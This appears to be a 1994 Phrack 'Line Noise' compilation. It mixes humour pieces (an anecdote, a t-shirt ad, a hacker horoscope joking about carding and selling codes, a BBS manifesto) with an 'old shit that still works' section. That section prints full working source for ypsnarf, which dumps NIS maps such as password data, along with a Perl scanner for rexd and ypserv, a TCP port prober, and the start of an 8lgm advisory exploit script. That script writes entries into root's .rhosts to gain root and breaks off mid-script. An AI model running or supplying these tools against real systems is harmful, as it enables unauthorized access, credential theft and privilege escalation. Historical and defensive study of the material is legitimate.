ME:  "I'm just trying to buy a burrito and pay for it with this $2 bill."

I put the bill up near his face, and he flinches like I was taking a
swing at him.  He takes the bill, turns it over a few times in his hands,
and says

SG:  "Mike, what's wrong with this bill?"
MG:  "It's fake."
SG:  "It doesn't look fake to me."
MG:  "But it's a **$2** bill."
SG:  "Yeah?"
MG:  "Well, there's no such thing, is there?"

The security guard and I both looked at him like he was an idiot, and it
dawned on the guy that he had no clue.

My burrito was free and he threw in a small drink and those cinnamon
things, too.  Makes me want to get a whole stack of $2 bills just to see
what happens when I try to buy stuff.  If I got the right group of
people, I could probably end up in jail.  At least you get free food.

------------------------------------------------------------------------------


--------------------------------------------------------------------------------


                         ==Phrack Magazine==

              Volume Five, Issue Forty-Six, File 4 of 28


                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                                 PART II

------------------------------------------------------------------------------

The official Legion of Doom t-shirts are still available.
Join the net.luminaries world-wide in owning one of
these amazing shirts.  Impress members of the opposite sex, increase
your IQ, annoy system administrators, get raided by the government and
lose your wardrobe!

Can a t-shirt really do all this?  Of course it can!

--------------------------------------------------------------------------

"THE HACKER WAR  --  LOD vs MOD"

This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and  The Masters of Destruction.  The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD.  The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member.

(For a limited time, the original is back!)

"LEGION OF DOOM  --  INTERNET WORLD TOUR"

The front of this classic shirt displays "Legion of Doom Internet World
Tour" as well as a sword and telephone intersecting the planet
earth, skull-and-crossbones style.  The back displays the
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
(internet sites) and a quote from Aleister Crowley.

--------------------------------------------------------------------------

All t-shirts are sized XL, and are 100% cotton.

Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
postage.

Send checks or money orders.  Please, no credit cards, even if
it's really your card.


Name:       __________________________________________________

Address:    __________________________________________________

City, State, Zip:   __________________________________________


I want ____ "Hacker War" shirt(s)

I want ____ "Internet World Tour" shirt(s)

Enclosed is $______ for the total cost.


Mail to:   Chris Goggans
           603 W. 13th #1A-278
           Austin, TX 78701


These T-shirts are sold only as a novelty items, and are in no way
attempting to glorify computer crime.

------------------------------------------------------------------------------

                              introducing...

                    The PHRACK Horoscope, Summer 1994

  Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer

                                 ---

  Do you believe in the stars? Many do, some don't. In fact, the stars
can tell you a whole lot about the future. That's bullshit? You don't
believe it? Good. Be doomed. See you in hell. Here's the official PHRACK
horoscope for all eleet hackerz for the summer of 1994.

  You can use this chart to find out your zodiac sign by your DOB.

     Aquarius.....01/20 - 02/18       Leo..........07/23 - 08/22
     Pisces.......02/19 - 03/20       Virgo........08/23 - 09/22
     Aries........03/21 - 04/19       Libra........09/23 - 10/22
     Taurus.......04/20 - 05/20       Scorpio......10/23 - 11/21
     Gemini.......05/21 - 06/20       Sagittarius..11/22 - 12/21
     Cancer.......06/21 - 07/22       Capricorn....12/22 - 01/19

                                 ---

               oOo This summer's best combinations oOo

    YOU                   LOVE           BS VICTIM     H0T WAREZ
    ==============================================================
    Aquarius              Libra          Leo           Sagittarius
    Pisces                Sagittarius    Aquarius      Cancer
    Aries                 Aries          Cancer        Capricorn
    Taurus                Gemini         Pisces        Taurus
    Gemini                Cancer         Aries         Scorpio
    Cancer                Leo            Virgo         Gemini
    Leo                   Scorpio        Gemini        Leo
    Virgo                 Capricorn      Sagittarius   Libra
    Libra                 Virgo          Libra         Virgo
    Scorpio               Pisces         Capricorn     Pisces
    Sagittarius           Aquarius       Scorpio       Aquarius
    Capricorn             Taurus         Taurus        Aries
    ==============================================================

                                 ---

   And Now... The 3l33t And Official PHRACK Summer 1994 Horoscope!

   Aries [March 21st - April 19th]

 There is a pot full of k0DeZ at the end of the rainbow for you.
 Try to channel all your ambition on finding it, hint: you won't
 find it in /bin/gif/kitchen.gear.
 Warning: Risk of bust between August 5th and August 10th!
 Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]

   Taurus [April 20th - May 20th]

 PhedZzZz are lurking behind Saturn, obscured behind one of the rings.
 Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake
 any interstellar space travel, and avoid big yellow ships.
 Watch out for SprintNet Security between July 12th and August 1st.
 Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]

   Gemini [May 21st - June 20th]

 There might be a force dragging you into warez boards. Try to resist
 the attraction, or you might be thrown out of the paradise.
 Hint: If a stranger with a /ASL connect crosses your way, stay away
 from him.
 Warning: Your Dual Standard HST might explode sometime in June.
 Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]

   Cancer [June 21st - July 22nd]

 There are dark forces on your trail. Try to avoid all people wearing
 suits, don't get in their cars, and don't let them give you shit.
 Hint: Leave the country as soon if you can, or you won't be able to.
 Look out for U4EA on IRC in late July, you might get /killed.
 Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]

   Leo [July 23rd - August 22nd]

 The path of Venus this year tells us that there is love on the way
 for you. Don't look for it on X-rated ftp sites, it might be out there
 somewhere. Hint: Try getting out of the house more frequently or you
 might miss it.
 Warning: If Monica Weaver comes across your way, break and run!
 Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]

   Virgo [August 23rd - September 22nd]

 Pluto tells us that you should stay away from VAXes in the near future.
 Lunatic force tells us that you might have more luck on Berkeley UNIX.
 Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs.
 Warning: In the first week of October, there is a risk of being ANIed.
 Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]

   Libra [September 23rd - October 22nd]

 The closer way of Mars around the Sun this year might mean that you
 will be sued by a telco or a big corporation. The eclipse of Uranus
 could say that you might have some luck and card a VGA 486 Laptop.
 Hint: Be careful on the cordless.
 Watch out for good stuff in dumpsters between July 23rd and July 31st.
 Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]

   Scorpio [October 23rd - November 21st]

 Sun propulsions say that you should spend more time exploring the
 innards of credit report systems, but be aware that Saturn reminds
 you that one local car dealer has his I.D. monitored.
 Hint: Stay out of #warez
 Warning: A star called 43-141 might be your doom. Watch out.
 Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]

   Sagittarius [November 22nd - December 21st]

 Cold storms on Pluto suggest that you don't try to play eleet
 anarchist on one of the upcoming cons. Pluto also sees that there
 might be a slight chance that you catch a bullet pestering a cop.
 Hint: Be nice to your relatives.
 You might get lucky BSing during the third week of August.
 Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]

   Capricorn [December 22nd - January 19th]

 This summer brings luck to you. Everything you try is about to work
 out. You might find financial gain in selling k0DeZ to local warez
 bozos. Hint: Don't try to BS at a number who is a prime number, they
 will trace your ass and beat you to death with a raw cucumber.
 Special kick of luck between June 14th and July 2nd.
 Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]

   Aquarius [January 20th - February 18th]

 The third moon of Saturn suggests to stay in bed over the whole
 summer, or everything will worsen. Avoid to go to any meetings
 and cons. Do not try to get up before September 11th.
 Hint: You can risk to call PRODIGY and have a gR3aT time.
 Warning: High chance of eavesdroping on your line on August 14th.
 Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]

   Pisces [February 19th - March 20th]

 Mars reads a high mobility this summer. You should try to go to a
 foreign county, maybe visit HEU II. Finances will be OK. Do not go
 on any buses for that might be your doom.
 Hint: Don't get a seat near a window, whatever you do.
 Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
 Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]


If your horoscope does not come true, complain to god@heaven.mil.   31337
If it does, you are welcome to report it to onkeld@ponton.hanse.de. 43V3R

------------------------------------------------------------------------------

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
                   The SenseReal Mission
  If you are reading this it indicates you have reached a point
along your journey that you will have to decide whether you agree
with The SenseReal Foundation or whether you think that those who
believe and support The SenseReal Foundation are crazy. Your
decision to join The SenseReal Foundation on it's mission will
undoubtedly change your life forever. When you understand the
reason it exists and what it seeks you will better know how to
decide. That is why this text was created.
  He is known as Green Ghost. Some know him as Jim Nightshade. He
was born in 1966. He is not a baby boomer and he is not a
Generation Xer. He falls into that group of the population that
has so far escaped definition. He is a (yberpunk. He was (yberpunk
before (yberpunk was cool. He is the founder and leader of The
SenseReal Foundation. You will learn more about him later.
  But first you will have to know about the background. There once
was a man named Albert Hoffman. In 1943, on April 16 Hoffman
absorbed a threshold amount of the drug known as LSD. He
experienced "a peculiar restlessness". LSD since that time has
played an important role in this world.
  There are other agents involved in the story. Mary Pinchot, JFK,
Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley
and many others. There are too many details and explanations
necessary to explain everything here. But this does not matter.
  Because the SenseReal Foundation is about riding the wave. We
believe that the ultimate goal cannot be defined. To define it
would be to destroy it.
  The SenseReal Foundation hopes that things can be changed for
the better. But we realize that the situation can become
much worse. From what history teaches us and what we instinctively
feel, we know that there is a great probability that things will
get much worse before and if things ever get better. Doom looms
on the horizon like an old friend.
  Freedom is being threatened every day and The SenseReal
Foundation seeks to defend and seek Freedom. Big Brother is here
NOW and to deny his existence is only to play into his hand. The
goal of our government both here in America and worldwide is to
remain in power and increase it's control of The People. To
expose Big Brother and destroy him is one of the many goals of
The SenseReal Foundation.
  As a member of (yberspace and an agent of The SenseReal
Foundation you will have to carefully consider your interaction
with the flow of Info. The ideals of Liberty must be maintained.
  The SenseReal Foundation provides a grounding point. The place
where the spark transfers from plasma to light and back to plasma.
Tesla was not on the wrong track. The SenseReal Foundation is a
mechanism which seeks to increase Freedom. Only by learning more
can we defeat the Evil. The Good must prevail.
  If you have the Hacker spirit and think along the same lines
then The SenseReal Foundation may be your calling. If you think
like J.R. Dobbs or Green Ghost then it is possible we can make it
through The Apocalypse. A final date has never been announced for
this event. Green Ghost does not claim to know the exact date but
he does claim to have some Info on it.
  Green Ghost does not claim to have all the answers or even to
know all the questions. He was first exposed to computers in the
early 70's at his local high school. The first computer he ever
used was a Honeywell terminal connected to a mainframe operated
at the home office of Honeywell and operated for the school.
  This machine was programed by feeding it stacks of cards with
boxes X'd out with a No. 2 pencil. It did have a keyboard hooked
up to a printer which served for the monitor. The text was typed
out and the paper rolled out of the machine in great waves.
This experience left him wanting more. Somewhere between the
machine and the mind were all the questions and all the answers.
  The SenseReal Foundation will supply some of the means. We
must all work together if we are to succeed. UNITED WE STAND,
DIVIDED WE FALL. If you wish to participate with The SenseReal
Foundation you must devote yourself to becoming an Info Agent.
  As an Info Agent it is your duty to seek Truth and Knowledge
out wherever it is located. To Learn and to seek to increase
the Learning of all at The SenseReal Foundation. Different
people will be needed to help out in different ways.
  SenseReal's Info Agents are located all around the world and
are in contact with fellow SenseReal members via any one of
several SenseReal facilities. The primary establishment and
headquarters of The SenseReal Foundation is SenseReal's own
online system:
       T /-/ E  /-/ /=\ ( /< E R ' S  /\/\ /=\ /\/ S / O /\/
            >>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<<
 27 Hours Per Day  /14.4 Supra /Home of The SenseReal Foundation
Also contact via SenseReal's mail drop by writing or sending
materials to:   TSF              \   Electronic Mail:
           P.O. BOX 6914         \   Green_Ghost@neonate.atl.ga.us
      HILTON HEAD, SC 29938-6914 \
  The Hacker's /\/\ansion is a system like no other. While it is
not your typical Hackers board it has much Info on Hacking. While
it is not like any Adult system you've ever seen it has the most
finest Adult material available anywhere. It is not a Warez board
but we are definitely Pirates. Because we are (yberpunks. What
makes the Hacker's Mansion different is our emphasis on quality.
  Everything that you find at The /-/acker's /\/\ansion is 1ST
(lass. All the coolest E-zines are pursued here. Phrack, CUD, and
Thought Virus to name just a few. Of course there is one other
source for Thought Virus:
  Send E-Mail to:  ListServ@neonate.atl.ga.us
In the subject or body of the message write:
  FAQ ThoughtCriminals
and you will receive the current issue in your E-Mail box in no
time.  If you wish to join the Thought Criminals mailing list and
communicate with your fellow Thought Criminals via E-Mail then
send another message to: ListServ@neonate.atl.ga.us
and write the following in the subject or body of the message:
  Subscribe ThoughtCriminals Your-Address-Here
or simply: Subscribe ThoughtCriminals
To mail others on the Thought Criminals mailing list send a message
to: ThoughtCriminals@neonate.atl.ga.us
Tell us all. Communication is vital. Our survival may depend on
it. The SenseReal Foundation is about the allegiance of many
people, and indeed beings, as our friends from other planets can
tell you. The EFF inspired us and was a model but we don't have
the EFF's money so we need YOU. If you are someone who can
contribute or who believes in The Cause or are just interested
in Tax Resistance or the Free The Weed movement then you should
join The SenseReal Foundation today. Contact us through any of
above channels and become a Freedom Fighter today. Time is of
the essence.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

------------------------------------------------------------------------------

                    ** OLD SHIT THAT STILL WORKS **

                           -  sometimes  -

/*
 * THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN
 * THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE
 * IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM.  PLEASE DO NOT
 * REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY.
 *
 * ypsnarf - exercise security holes in yp/nis.
 *
 * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik
 * (casper@fwi.uva.nl).
 *
 * Usage:
 *  ypsnarf server client
 *   - to obtain the yp domain name
 *  ypsnarf server domain mapname
 *   - to obtain a copy of a yp map
 *  ypsnarf server domain maplist
 *   - to obtain a list of yp maps
 *
 * In the first case, we lie and pretend to be the host "client", and send
 * a BOOTPARAMPROC_WHOAMI request to the host "server".  Note that for this
 * to work, "server" must be running rpc.bootparamd, and "client" must be a
 * diskless client of (well, it must boot from) "server".
 *
 * In the second case, we send a YPPROC_DOMAIN request to the host "server",
 * asking if it serves domain "domain".  If so, we send YPPROC_FIRST and
 * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map
 * "mapname".  Note that you must specify the full yp map name, you cannot
 * use the shorthand names provided by "ypcat".
 *
 * In the third case, the special map name "maplist" tells ypsnarf to send
 * a YPPROC_MAPLIST request to the server and get the list of maps in domain
 * "domain", instead of getting the contents of a map.  If the server has a
 * map called "maplist" you can't get it.  Oh well.
 *
 * Since the callrpc() routine does not make any provision for timeouts, we
 * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the
 * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer.
 *
 * This program uses UDP packets, which means there's a chance that things
 * will get dropped on the floor; it's not a reliable stream like TCP.  In
 * practice though, this doesn't seem to be a problem.
 *
 * To compile:
 *  cc -o ypsnarf ypsnarf.c -lrpcsvc
 *
 * David A. Curry
 * Purdue University
 * Engineering Computer Network
 * Electrical Engineering Building
 * West Lafayette, IN 47907
 * davy@ecn.purdue.edu
 * January, 1991
 */
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <rpc/rpc.h>
#include <rpcsvc/bootparam.h>
#include <rpcsvc/yp_prot.h>
#include <rpc/pmap_clnt.h>
#include <sys/time.h>
#include <signal.h>
#include <string.h>
#include <netdb.h>
#include <stdio.h>

#define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd  */
#define YPSNARF_TIMEOUT1 15 /* timeout for initial request */
#define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */

char *pname;    /* program name   */

main(argc, argv)
char **argv;
int argc;
{
 char *server, *client, *domain, *mapname;

 pname = *argv;

 /*
  * Process arguments.  This is less than robust, but then
  * hey, you're supposed to know what you're doing.
  */
 switch (argc) {
 case 3:
  server = *++argv;
  client = *++argv;

  get_yp_domain(server, client);
  exit(0);
 case 4:
  server = *++argv;
  domain = *++argv;
  mapname = *++argv;

  if (strcmp(mapname, "maplist") == 0)
   get_yp_maplist(server, domain);
  else
   get_yp_map(server, domain, mapname);
  exit(0);
 default:
  fprintf(stderr, "Usage: %s server client         -", pname);
  fprintf(stderr, "to obtain yp domain name\n");
  fprintf(stderr, "       %s server domain mapname -", pname);
  fprintf(stderr, "to obtain contents of yp map\n");
  exit(1);
 }
}

/*
 * get_yp_domain - figure out the yp domain used between server and client.
 */
get_yp_domain(server, client)
char *server, *client;
{
 long hostip;
 struct hostent *hp;
 bp_whoami_arg w_arg;
 bp_whoami_res w_res;
 extern void timeout();
 enum clnt_stat errcode;

 /*
  * Just a sanity check, here.
  */
 if ((hp = gethostbyname(server)) == NULL) {
  fprintf(stderr, "%s: %s: unknown host.\n", pname, server);
  exit(1);
 }

 /*
  * Allow the client to be either an internet address or a
  * host name.  Copy in the internet address.
  */
 if ((hostip = inet_addr(client)) == -1) {
  if ((hp = gethostbyname(client)) == NULL) {
   fprintf(stderr, "%s: %s: unknown host.\n", pname,
    client);
   exit(1);
  }

  bcopy(hp->h_addr_list[0],
        (caddr_t) &w_arg.client_address.bp_address.ip_addr,
        hp->h_length);
 }
 else {
  bcopy((caddr_t) &hostip,
        (caddr_t) &w_arg.client_address.bp_address.ip_addr,
        sizeof(ip_addr_t));
 }

 w_arg.client_address.address_type = IP_ADDR_TYPE;
 bzero((caddr_t) &w_res, sizeof(bp_whoami_res));

 /*
  * Send a BOOTPARAMPROC_WHOAMI request to the server.  This will
  * give us the yp domain in the response, IFF client boots from
  * the server.
  */
 signal(SIGALRM, timeout);
 alarm(YPSNARF_TIMEOUT1);

 errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS,
     BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg,
     xdr_bp_whoami_res, &w_res);

 alarm(0);

 if (errcode != RPC_SUCCESS)
  print_rpc_err(errcode);

 /*
  * Print the domain name.
  */
 printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name);

 /*
  * The maximum domain name length is 255 characters, but the
  * rpc.bootparamd program truncates anything over 32 chars.
  */
 if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN)
  printf(" (truncated?)");

 /*
  * Put out the client name, if they didn't know it.
  */
 if (hostip != -1)
  printf(" (client name = %s)", w_res.client_name);

 putchar('\n');
}

/*
 * get_yp_map - get the yp map "mapname" from yp domain "domain" from server.
 */
get_yp_map(server, domain, mapname)
char *server, *domain, *mapname;
{
 char *reqp;
 bool_t yesno;
 u_long calltype;
 bool (*xdr_proc)();
 extern void timeout();
 enum clnt_stat errcode;
 struct ypreq_key keyreq;
 struct ypreq_nokey nokeyreq;
 struct ypresp_key_val answer;

 /*
  * This code isn't needed; the next call will give the same
  * error message if there's no yp server there.
  */
#ifdef not_necessary
 /*
  * "Ping" the yp server and see if it's there.
  */
 signal(SIGALRM, timeout);
 alarm(YPSNARF_TIMEOUT1);

 errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
     xdr_void, 0);

 alarm(0);

 if (errcode != RPC_SUCCESS)
  print_rpc_err(errcode);
#endif

 /*
  * Figure out whether server serves the yp domain we want.
  */
 signal(SIGALRM, timeout);
 alarm(YPSNARF_TIMEOUT1);

 errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
     xdr_wrapstring, (caddr_t) &domain, xdr_bool,
     (caddr_t) &yesno);

 alarm(0);

 if (errcode != RPC_SUCCESS)
  print_rpc_err(errcode);

 /*
  * Nope...
  */
 if (yesno == FALSE) {
  fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
   server, domain);
  exit(1);
 }

 /*
  * Now we just read entry after entry...  The first entry we
  * get with a nokey request.
  */
 keyreq.domain = nokeyreq.domain = domain;
 keyreq.map = nokeyreq.map = mapname;
 reqp = (caddr_t) &nokeyreq;
 keyreq.keydat.dptr = NULL;

 answer.status = TRUE;
 calltype = YPPROC_FIRST;
 xdr_proc = xdr_ypreq_nokey;

 while (answer.status == TRUE) {
  bzero((caddr_t) &answer, sizeof(struct ypresp_key_val));

  signal(SIGALRM, timeout);
  alarm(YPSNARF_TIMEOUT2);

  errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc,
      reqp, xdr_ypresp_key_val, &answer);

  alarm(0);

  if (errcode != RPC_SUCCESS)
   print_rpc_err(errcode);

  /*
   * Got something; print it.
   */
  if (answer.status == TRUE) {
   printf("%.*s\n", answer.valdat.dsize,
          answer.valdat.dptr);
  }

  /*
   * Now we're requesting the next item, so have to
   * send back the current key.
   */
  calltype = YPPROC_NEXT;
  reqp = (caddr_t) &keyreq;
  xdr_proc = xdr_ypreq_key;

  if (keyreq.keydat.dptr)
   free(keyreq.keydat.dptr);

  keyreq.keydat = answer.keydat;

  if (answer.valdat.dptr)
   free(answer.valdat.dptr);
 }
}

/*
 * get_yp_maplist - get the yp map list for  yp domain "domain" from server.
 */
get_yp_maplist(server, domain)
char *server, *domain;
{
 bool_t yesno;
 extern void timeout();
 struct ypmaplist *mpl;
 enum clnt_stat errcode;
 struct ypresp_maplist maplist;

 /*
  * This code isn't needed; the next call will give the same
  * error message if there's no yp server there.
  */
#ifdef not_necessary
 /*
  * "Ping" the yp server and see if it's there.
  */
 signal(SIGALRM, timeout);
 alarm(YPSNARF_TIMEOUT1);

 errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0,
     xdr_void, 0);

 alarm(0);

 if (errcode != RPC_SUCCESS)
  print_rpc_err(errcode);
#endif

 /*
  * Figure out whether server serves the yp domain we want.
  */
 signal(SIGALRM, timeout);
 alarm(YPSNARF_TIMEOUT1);

 errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN,
     xdr_wrapstring, (caddr_t) &domain, xdr_bool,
     (caddr_t) &yesno);

 alarm(0);

 if (errcode != RPC_SUCCESS)
  print_rpc_err(errcode);

 /*
  * Nope...
  */
 if (yesno == FALSE) {
  fprintf(stderr, "%s: %s does not serve domain %s.\n", pname,
   server, domain);
  exit(1);
 }

 maplist.list = (struct ypmaplist *) NULL;

 /*
  * Now ask for the list.
  */
 signal(SIGALRM, timeout);
 alarm(YPSNARF_TIMEOUT1);

 errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST,
     xdr_wrapstring, (caddr_t) &domain,
     xdr_ypresp_maplist, &maplist);

 alarm(0);

 if (errcode != RPC_SUCCESS)
  print_rpc_err(errcode);

 if (maplist.status != YP_TRUE) {
  fprintf(stderr, "%s: cannot get map list: %s\n", pname,
   yperr_string(ypprot_err(maplist.status)));
  exit(1);
 }

 /*
  * Print out the list.
  */
 for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next)
  printf("%s\n", mpl->ypml_name);
}

/*
 * print_rpc_err - print an rpc error and exit.
 */
print_rpc_err(errcode)
enum clnt_stat errcode;
{
 fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode));
 exit(1);
}

/*
 * timeout - print a timeout and exit.
 */
void timeout()
{
 fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname);
 exit(1);
}

------------------------------------------------------------------------------

#!/bin/perl -s
#
#   Scan a subnet for valid hosts; if given hostname, will look at the
# 255 possible hosts on that net.  Report if host is running rexd or
# ypserv.
#
#  Usage:  scan n.n.n.n

# mine, by default
$default = "130.80.26";

$| = 1;

if ($v) { $verbose = 1; }

if ($#ARGV == -1) { $root = $default; }
else { $root = $ARGV[0]; }

# ip address
if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) {
        ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root);
        ($one,$two,$three,$four) = unpack('C4',$host_ip[0]);
        $root = "$one.$two.$three";
        if ($root eq "..") { die "Can't figure out what to scan...\n"; }
        }

print "Subnet $root:\n" if $verbose;
for $i (01..255) {
        print "Trying $root.$i\t=> " if $verbose;
        &resolve("$root.$i");
        }

#
#  Do the work
#
sub resolve {

local($name) = @_;

# ip address
if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) {
        ($a,$b,$c,$d) = split(/\./, $name);
        @ip = ($a,$b,$c,$d);
        ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET);
        }
else {
        ($name, $aliases, $type, $len, @ip) = gethostbyname($name);
        ($a,$b,$c,$d) = unpack('C4',$ip[0]);
        }

if ($name && @ip) {
        print "$a.$b.$c.$d\t$name\n";
        system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R
unning ypserv.\"\nfi\nfi");
        }
else { print "unable to resolve address\n" if $verbose; }

}

sub AF_INET {2;}

------------------------------------------------------------------------------

/*
 * probe_tcp_ports
 */


#include <sys/types.h>
#include <sys/stat.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define RETURN_ERR -1
#define RETURN_FAIL 0
#define RETURN_SUCCESS 1

int             Debug;
int             Hack;
int             Verbose;

main(ArgC, ArgV)
 int             ArgC;
 char          **ArgV;
{
 int             Index;
 int             SubIndex;

 for (Index = 1; (Index < ArgC) && (ArgV[Index][0] == '-'); Index++)
     for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++)
  switch (ArgV[Index][SubIndex])
  {
  case 'd':
   Debug++;
   break;
  case 'h':
   Hack++;
   break;
  case 'v':
   Verbose++;
   break;
  default:
   (void) fprintf(stderr,
  "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n");
   exit(1);
  }

 for (; Index < ArgC; Index++)
  (void) Probe_TCP_Ports(ArgV[Index]);
 exit(0);
}

Probe_TCP_Ports(Name)
 char           *Name;
{
 unsigned        Port;
 char           *Host;
 struct hostent *HostEntryPointer;
 struct sockaddr_in SocketInetAddr;
 struct hostent  TargetHost;
 struct in_addr  TargetHostAddr;
 char           *AddressList[1];
 char            NameBuffer[128];

 extern int      inet_addr();
 extern char    *rindex();

 if (Name == NULL)
  return (RETURN_FAIL);
 Host = Name;
 if (Host == NULL)
  return (RETURN_FAIL);
 HostEntryPointer = gethostbyname(Host);
 if (HostEntryPointer == NULL)
  {
  TargetHostAddr.s_addr = inet_addr(Host);
  if (TargetHostAddr.s_addr == -1)
   {
   (void) printf("unknown host: %s\n", Host);
   return (RETURN_FAIL);
   }
  (void) strcpy(NameBuffer, Host);
  TargetHost.h_name = NameBuffer;
  TargetHost.h_addr_list = AddressList, TargetHost.h_addr =
   (char *) &TargetHostAddr;
  TargetHost.h_length = sizeof(struct in_addr);
  TargetHost.h_addrtype = AF_INET;
  TargetHost.h_aliases = 0;
  HostEntryPointer = &TargetHost;
  }
 SocketInetAddr.sin_family = HostEntryPointer->h_addrtype;
 bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr,
  HostEntryPointer->h_length);


 for (Port = 1; Port < 65536; Port++)
  (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr);
 return (RETURN_SUCCESS);
}

Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr)
 unsigned        Port;
 struct hostent *HostEntryPointer;
 struct sockaddr_in SocketInetAddr;
{
 char            Buffer[BUFSIZ];
 int             SocketDescriptor;
 struct servent *ServiceEntryPointer;


 SocketInetAddr.sin_port = Port;
 SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6);
 if (SocketDescriptor < 0)
  {
  perror("socket");
  return (RETURN_ERR);
  }
 if (Verbose)
  {
  (void) printf("Host %s, Port %d ", HostEntryPointer->h_name,
         Port);
  if ((ServiceEntryPointer = getservbyport(Port, "tcp")) !=
      (struct servent *) NULL)
   (void) printf(" (\"%s\" service) ",
          ServiceEntryPointer->s_name);
  (void) printf("connection ... ");
  (void) fflush(stdout);
  }
 if (connect(SocketDescriptor, (char *) &SocketInetAddr,
      sizeof(SocketInetAddr)) < 0)
  {
  if (Verbose)
   (void) printf("NOT open.\n");
  if (Debug)
   perror("connect");
  }
 else
  {
  if (!Verbose)
   {
   (void) printf("Host %s, Port %d ",
          HostEntryPointer->h_name, Port);
   if ((ServiceEntryPointer = getservbyport(Port,"tcp")) !=
       (struct servent *) NULL)
    (void) printf(" (\"%s\" service) ",
           ServiceEntryPointer->s_name);
   (void) printf("connection ... ");
   (void) fflush(stdout);
   }
  (void) printf("open.\n");
  if (Hack)
   {
   (void) sprintf(Buffer, "/usr/ucb/telnet %s %d",
           HostEntryPointer->h_name, Port);
   (void) system(Buffer);
   }
  }

 (void) close(SocketDescriptor);
 return (RETURN_SUCCESS);
}

------------------------------------------------------------------------------

[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991

PROGRAM:

 autoreply(1) (/usr/local/bin/autoreply)
   Supplied with the Elm Mail System

VULNERABLE OS's:

 Any system with a standard installation of The Elm Mail System.
 All versions are believed to have this vulnerability.

DESCRIPTION:

 autoreply(1) can be used to create root owned files, with mode
 666.  It can also overwrite any file with semi user-controlled
 data.

IMPACT:

 Any user with access to autoreply(1) can alter system files and
 thus become root.

REPEAT BY:

 This example demonstrates how to become root on most affected
 machines by modifying root's .rhosts file.  Please do not do
 this unless you have permission.

 Create the following script, 'fixrhosts':

8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
 echo "Usage: `basename $0` rhosts-file user machine"
 exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
